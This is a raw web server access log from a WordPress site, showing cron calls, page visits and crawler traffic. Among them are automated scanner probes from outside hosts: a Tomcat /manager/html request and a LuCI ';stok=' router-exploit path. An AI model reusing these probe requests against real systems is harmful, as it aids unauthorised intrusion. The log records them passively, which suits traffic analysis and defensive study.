42.236.17.46 - - [04/Oct/2025:09:49:45 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
36.133.115.36 - - [04/Oct/2025:09:49:51 +0800] "POST /wp-cron.php?doing_wp_cron=1759542591.3052790164947509765625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
42.236.17.46 - - [04/Oct/2025:09:49:51 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 33 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
36.133.115.36 - - [04/Oct/2025:09:51:00 +0800] "POST /wp-cron.php?doing_wp_cron=1759542660.5453770160675048828125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.195.99 - - [04/Oct/2025:09:51:00 +0800] "GET / HTTP/1.1" 200 33465 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Oct/2025:09:53:37 +0800] "POST /wp-cron.php?doing_wp_cron=1759542817.2829871177673339843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
173.197.14.229 - - [04/Oct/2025:09:53:37 +0800] "GET /manager/html HTTP/1.1" 404 8990 "-" "python-requests/2.27.1"
116.179.32.83 - - [04/Oct/2025:09:54:51 +0800] "GET /services/processing/ HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
36.133.115.36 - - [04/Oct/2025:10:00:44 +0800] "POST /wp-cron.php?doing_wp_cron=1759543244.6682341098785400390625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
37.60.141.156 - - [04/Oct/2025:10:00:44 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 301 5 "-" "-"
37.60.141.156 - - [04/Oct/2025:10:00:46 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 31381 "http://36.133.115.36:80/cgi-bin/luci/;stok=/locale" "-"
36.133.115.36 - - [04/Oct/2025:10:05:26 +0800] "POST /wp-cron.php?doing_wp_cron=1759543526.7284080982208251953125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.6 - - [04/Oct/2025:10:05:27 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Oct/2025:10:06:53 +0800] "POST /wp-cron.php?doing_wp_cron=1759543613.7605168819427490234375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
93.123.109.214 - - [04/Oct/2025:10:06:53 +0800] "GET / HTTP/1.1" 301 5 "-" "l9tcpid/v1.1.0"
36.133.115.36 - - [04/Oct/2025:10:26:58 +0800] "POST /wp-cron.php?doing_wp_cron=1759544818.2210819721221923828125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.90 - - [04/Oct/2025:10:26:58 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Oct/2025:10:30:20 +0800] "POST /wp-cron.php?doing_wp_cron=1759545020.4344220161437988281250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
